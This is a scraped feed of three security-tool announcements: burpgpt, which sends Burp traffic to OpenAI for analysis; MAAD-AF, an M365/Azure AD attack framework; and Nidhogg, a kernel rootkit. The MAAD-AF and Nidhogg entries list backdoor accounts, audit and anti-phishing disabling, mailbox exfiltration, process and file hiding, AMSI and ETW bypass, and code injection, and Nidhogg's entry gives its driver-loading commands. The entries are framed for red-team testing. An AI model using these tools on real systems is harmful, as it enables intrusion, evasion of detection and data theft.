The extension generates an automated security report that summarises potential security issues based on the user's prompt and real-time data from Burp-issued requests. By leveraging AI and natural language processing, the extension streamlines the security assessment process and provides security professionals with a higher-level overview of the scanned application or endpoint. This enables them to more easily identify potential security issues and prioritise their analysis, while also covering a larger potential attack surface.

[!WARNING] Data traffic is sent to OpenAI for analysis. If you have concerns about this or are using the extension for security-critical applications, it is important to carefully consider this and review OpenAI's Privacy Policy for further information.

[!WARNING] While the report is automated, it still requires triaging and post-processing by security professionals, as it may contain false positives.

[!WARNING] The effectiveness of this extension is heavily reliant on the quality and precision of the prompts created by the user for the selected GPT model. This targeted approach will help ensure the GPT model generates accurate and valuable results for your security analysis.


Features

  • Adds a passive scan check, allowing users to submit HTTP data to an OpenAI-controlled GPT model for analysis through a placeholder system.
  • Leverages the power of OpenAI's GPT models to conduct comprehensive traffic analysis, enabling detection of various issues beyond just security vulnerabilities in scanned applications.
  • Enables granular control over the number of GPT tokens used in the analysis by allowing for precise adjustments of the maximum prompt length.
  • Offers users multiple OpenAI models to choose from, allowing them to select the one that best suits their needs.
  • Empowers users to customise prompts and unleash limitless possibilities for interacting with OpenAI models. Browse through the Example Use Cases for inspiration.
  • Integrates with Burp Suite, providing all native features for pre- and post-processing, including displaying analysis results directly within the Burp UI for efficient analysis.
  • Provides troubleshooting functionality via the native Burp Event Log, enabling users to quickly resolve communication issues with the OpenAI API.

Requirements

  1. System requirements:
  • Operating System: Compatible with Linux, macOS, and Windows operating systems.

  • Java Development Kit (JDK): Version 11 or later.

  • Burp Suite Professional or Community Edition: Version 2023.3.2 or later.

    [!IMPORTANT] Please note that using any version lower than 2023.3.2 may result in a java.lang.NoSuchMethodError. It is crucial to use the specified version or a more recent one to avoid this issue.

  2. Build tool:
  • Gradle: Version 6.9 or later (recommended). The build.gradle file is provided in the project repository.
  3. Environment variables:
  • Set up the JAVA_HOME environment variable to point to the JDK installation directory.

Please ensure that all system requirements, including a compatible version of Burp Suite, are met before building and running the project. Note that the project's external dependencies will be automatically managed and installed by Gradle during the build process. Adhering to the requirements will help avoid potential issues and reduce the need for opening new issues in the project repository.

Installation

1. Compilation

  1. Ensure you have Gradle installed and configured.

  2. Download the burpgpt repository:

    git clone https://github.com/aress31/burpgpt
    cd .\burpgpt\
  3. Build the standalone jar:

    ./gradlew shadowJar

2. Loading the Extension Into Burp Suite

To install burpgpt in Burp Suite, first go to the Extensions tab and click on the Add button. Then, select the burpgpt-all jar file located in the .\lib\build\libs folder to load the extension.

Usage

To start using burpgpt, users need to complete the following steps in the Settings panel, which can be accessed from the Burp Suite menu bar:

  1. Enter a valid OpenAI API key.
  2. Select a model.
  3. Define the max prompt size. This field controls the maximum prompt length sent to OpenAI to avoid exceeding the maxTokens of GPT models (typically around 2048 for GPT-3).
  4. Adjust or create custom prompts according to your requirements.

Once configured as outlined above, the Burp passive scanner sends each request to the chosen OpenAI model via the OpenAI API for analysis, producing Informational-level severity findings based on the results.

Prompt Configuration

burpgpt enables users to tailor the prompt for traffic analysis using a placeholder system. To include relevant information, we recommend using these placeholders, which the extension handles directly, allowing dynamic insertion of specific values into the prompt:

Placeholder Description
{REQUEST} The scanned request.
{URL} The URL of the scanned request.
{METHOD} The HTTP request method used in the scanned request.
{REQUEST_HEADERS} The headers of the scanned request.
{REQUEST_BODY} The body of the scanned request.
{RESPONSE} The scanned response.
{RESPONSE_HEADERS} The headers of the scanned response.
{RESPONSE_BODY} The body of the scanned response.
{IS_TRUNCATED_PROMPT} A boolean value that is programmatically set to true or false to indicate whether the prompt was truncated to the Maximum Prompt Size defined in the Settings.

These placeholders can be used in the custom prompt to dynamically generate a request/response analysis prompt that is specific to the scanned request.
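
Conceptually, the substitution is a simple string-replacement pass over the prompt template. This Python sketch illustrates the mechanism only; burpgpt is a Java extension, and the request/response values below are made up:

# Illustration of the placeholder mechanism, not burpgpt's actual code.
template = (
    "Analyse the following exchange for vulnerabilities:\n"
    "URL: {URL}\n"
    "Request headers: {REQUEST_HEADERS}\n"
    "Response body: {RESPONSE_BODY}"
)
values = {  # hypothetical example values
    "{URL}": "https://example.com/login",
    "{REQUEST_HEADERS}": "POST /login HTTP/1.1 ...",
    "{RESPONSE_BODY}": "<html>Welcome back</html>",
}
prompt = template
for placeholder, value in values.items():
    prompt = prompt.replace(placeholder, value)
print(prompt)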

[!NOTE] Burp Suite provides the capability to support arbitrary placeholders through the use of Session handling rules or extensions such as Custom Parameter Handler, allowing for even greater customisation of the prompts.

Example Use Cases

The following list of example use cases showcases the bespoke and highly customisable nature of burpgpt, which enables users to tailor their web traffic analysis to meet their specific needs.

  • Identifying potential vulnerabilities in web applications that use a crypto library affected by a specific CVE:

    Analyse the request and response data for potential security vulnerabilities related to the {CRYPTO_LIBRARY_NAME} crypto library affected by CVE-{CVE_NUMBER}:

    Web Application URL: {URL}
    Crypto Library Name: {CRYPTO_LIBRARY_NAME}
    CVE Number: CVE-{CVE_NUMBER}
    Request Headers: {REQUEST_HEADERS}
    Response Headers: {RESPONSE_HEADERS}
    Request Body: {REQUEST_BODY}
    Response Body: {RESPONSE_BODY}

    Identify any potential vulnerabilities related to the {CRYPTO_LIBRARY_NAME} crypto library affected by CVE-{CVE_NUMBER} in the request and response data and report them.
  • Scanning for vulnerabilities in web applications that use biometric authentication by analysing request and response data related to the authentication process:

    Analyse the request and response data for potential security vulnerabilities related to the biometric authentication process:

    Web Application URL: {URL}
    Biometric Authentication Request Headers: {REQUEST_HEADERS}
    Biometric Authentication Response Headers: {RESPONSE_HEADERS}
    Biometric Authentication Request Body: {REQUEST_BODY}
    Biometric Authentication Response Body: {RESPONSE_BODY}

    Identify any potential vulnerabilities related to the biometric authentication process in the request and response data and report them.
  • Analysing the request and response data exchanged between serverless functions for potential security vulnerabilities:

    Analyse the request and response data exchanged between serverless functions for potential security vulnerabilities:

    Serverless Function A URL: {URL}
    Serverless Function B URL: {URL}
    Serverless Function A Request Headers: {REQUEST_HEADERS}
    Serverless Function B Response Headers: {RESPONSE_HEADERS}
    Serverless Function A Request Body: {REQUEST_BODY}
    Serverless Function B Response Body: {RESPONSE_BODY}

    Identify any potential vulnerabilities in the data exchanged between the two serverless functions and report them.
  • Analysing the request and response data for potential security vulnerabilities specific to a Single-Page Application (SPA) framework:

    Analyse the request and response data for potential security vulnerabilities specific to the {SPA_FRAMEWORK_NAME} SPA framework:

    Web Application URL: {URL}
    SPA Framework Name: {SPA_FRAMEWORK_NAME}
    Request Headers: {REQUEST_HEADERS}
    Response Headers: {RESPONSE_HEADERS}
    Request Body: {REQUEST_BODY}
    Response Body: {RESPONSE_BODY}

    Identify any potential vulnerabilities related to the {SPA_FRAMEWORK_NAME} SPA framework in the request and response data and report them.

Roadmap

  • Add a new field to the Settings panel that allows users to set the maxTokens limit for requests, thereby limiting the request size.
  • Add support for connecting to a local instance of the AI model, allowing users to run and interact with the model on their local machines, potentially improving response times and data privacy.
  • Retrieve the precise maxTokens value for each model to transmit the maximum allowable data and obtain the most extensive GPT response possible.
  • Implement persistent configuration storage to preserve settings across Burp Suite restarts.
  • Enhance the code for accurate parsing of GPT responses into the Vulnerability model for improved reporting.

Project Information

The extension is currently under development and we welcome feedback, comments, and contributions to make it even better.

Sponsor

If this extension has saved you time and hassle during a security assessment, consider showing some love by sponsoring a cup of coffee for the developer. It's the fuel that powers development, after all. Just hit that shiny Sponsor button at the top of the page or click here to contribute and keep the caffeine flowing.

Reporting Issues

Did you find a bug? Well, don't just let it crawl around! Let's squash it together like a couple of bug whisperers!

Please report any issues on the GitHub issues tracker. Together, we'll make this extension as reliable as a cockroach surviving a nuclear apocalypse!

Contributing

Looking to make a splash with your mad coding skills?

Awesome! Contributions are welcome and greatly appreciated. Please submit all PRs on the GitHub pull requests tracker. Together we can make this extension even more amazing!

License

See LICENSE.



☐ ☆ ✇ KitPloit - PenTest Tools!

MAAD-AF - MAAD Attack Framework - An Attack Tool For Simple, Fast And Effective Security Testing Of M365 And Azure AD

By: Zion3R — June 4th 2023 at 12:30

MAAD-AF is an open-source cloud attack tool developed for testing the security of Microsoft 365 & Azure AD environments through adversary emulation. MAAD-AF provides security practitioners with easy-to-use attack modules to exploit configurations across different M365/AzureAD cloud-based tools & services.

MAAD-AF is designed to make cloud security testing simple, fast and effective. Through its virtually no-setup requirement and easy to use interactive attack modules, security teams can test their security controls, detection and response capabilities easily and swiftly.

Features

  • Pre & Post-compromise techniques
  • Simple interactive use
  • Virtually no-setup requirements
  • Attack modules for Azure AD
  • Attack modules for Exchange
  • Attack modules for Teams
  • Attack modules for SharePoint
  • Attack modules for eDiscovery

MAAD-AF Attack Modules

  • Azure AD External Recon (Includes sub-modules)
  • Azure AD Internal Recon (Includes sub-modules)
  • Backdoor Account Setup
  • Trusted Network Modification
  • Disable Mailbox Auditing
  • Disable Anti-Phishing
  • Mailbox Deletion Rule Setup
  • Exfiltration through Mailbox Forwarding
  • Gain User Mailbox Access
  • External Teams Access Setup (Includes sub-modules)
  • eDiscovery exploitation (Includes sub-modules)
  • Bruteforce
  • MFA Manipulation
  • User Account Deletion
  • SharePoint exploitation (Includes sub-modules)

Getting Started

Plug & Play - It's that easy!

  1. Clone or download the MAAD-AF GitHub repo to your Windows host
  2. Open PowerShell as Administrator
  3. Navigate to the local MAAD-AF directory (cd /MAAD-AF)
  4. Run MAAD_Attack.ps1 (./MAAD_Attack.ps1)

Requirements

  1. Internet accessible Windows host
  2. PowerShell (version 5 or later) terminal as Administrator
  3. The following PowerShell modules are required and will be installed automatically:

Tip: A 'Global Admin' privilege account is recommended to leverage full capabilities of modules in MAAD-AF

Limitations

  • MAAD-AF is currently only fully supported on Windows OS

Contribute

  • Thank you for considering contributing to MAAD-AF!
  • Your contributions will help make MAAD-AF better.
  • Join the mission to make security testing simple, fast and effective.
  • There's ongoing efforts to make the source code more modular to enable easier contributions.
  • Continue monitoring this space for updates on how you can easily incorporate new attack modules into MAAD-AF.

Add Custom Modules

  • Everyone is encouraged to come up with new attack modules that can be added to the MAAD-AF Library.
  • Attack modules are functions that leverage access & privileges established by MAAD-AF to exploit configuration flaws in Microsoft services.

Report Bugs

  • Submit bugs or other issues related to the tool directly in the "Issues" section

Request Features

  • Share those great ideas. Submit new features to add to MAAD-AF's functionality.

Contact

  • If you found this tool useful, want to share an interesting use-case, bring issues to attention, whatever the reason - I would love to hear from you. You can contact at: maad-af@vectra.ai or post in repository Discussions.


☐ ☆ ✇ KitPloit - PenTest Tools!

Nidhogg - All-In-One Simple To Use Rootkit For Red Teams

By: Zion3R — May 31st 2023 at 12:30


Nidhogg is a multi-functional rootkit for red teams. The goal of Nidhogg is to provide an all-in-one, easy-to-use rootkit with multiple helpful functionalities for red team engagements that can be integrated with your C2 framework via a single header file. Usage is simple; you can see an example here.

Nidhogg can work on any version of x64 Windows 10 and Windows 11.

This repository contains a kernel driver with a C++ header to communicate with it.


Current Features

  • Process hiding and unhiding
  • Process elevation
  • Process protection (anti-kill and dumping)
  • Bypass pe-sieve
  • Thread hiding
  • Thread protection (anti-kill)
  • File protection (anti-deletion and overwriting)
  • File hiding
  • Registry keys and values protection (anti-deletion and overwriting)
  • Registry keys and values hiding
  • Querying currently protected processes, threads, files, registry keys and values
  • Arbitrary kernel R/W
  • Function patching
  • Built-in AMSI bypass
  • Built-in ETW patch
  • Process signature (PP/PPL) modification
  • Can be reflectively loaded
  • Shellcode Injection
    • APC
    • NtCreateThreadEx
  • DLL Injection
    • APC
    • NtCreateThreadEx
  • Querying kernel callbacks
    • ObCallbacks
    • Process and thread creation routines
    • Image loading routines
    • Registry callbacks
  • Removing and restoring kernel callbacks
  • ETWTI tampering

Reflective loading

Since version v0.3, Nidhogg can be reflectively loaded with kdmapper, but because PatchGuard will be triggered automatically if the driver registers callbacks, Nidhogg will not register any callbacks. This means that if you load the driver reflectively, these features are disabled by default:

  • Process protection
  • Thread protection
  • Registry operations
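
For reference, reflective loading with kdmapper typically comes down to a single command (paths are placeholders; check the kdmapper documentation for your setup):

kdmapper.exe Nidhogg.sys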

PatchGuard triggering features

These are the features known to me that will trigger PatchGuard; you can still use them at your own risk.

  • Process hiding
  • File protection

Basic Usage

It has a very simple usage, just include the header and get started!

#include "Nidhogg.hpp"

int main() {
    // Open a handle to the Nidhogg kernel driver.
    HANDLE hNidhogg = CreateFile(DRIVER_NAME, GENERIC_WRITE | GENERIC_READ, 0, nullptr, OPEN_EXISTING, 0, nullptr);
    // ...
    // Ask the driver to protect the process IDs listed in pids.
    DWORD result = Nidhogg::ProcessUtils::NidhoggProcessProtect(pids);
    // ...
}

Setup

Building the client

To compile the client, you will need CMake and Visual Studio 2022 installed, and then just run:

cd <NIDHOGG PROJECT DIRECTORY>\Example
mkdir build
cd build
cmake ..
cmake --build .

Building the driver

To compile the project, you will need the following tools:

Clone the repository and build the driver.

Driver Testing

To test it in your testing environment, run the following command from an elevated cmd:

bcdedit /set testsigning on

After rebooting, create a service and run the driver:

sc create nidhogg type= kernel binPath= C:\Path\To\Driver\Nidhogg.sys
sc start nidhogg

Debugging

To debug the driver in your testing environment run this command with elevated cmd and reboot your computer:

bcdedit /debug on

After the reboot, you can see the debugging messages in tools such as DebugView.

Resources

Contributions

Thanks a lot to those people that contributed to this project:


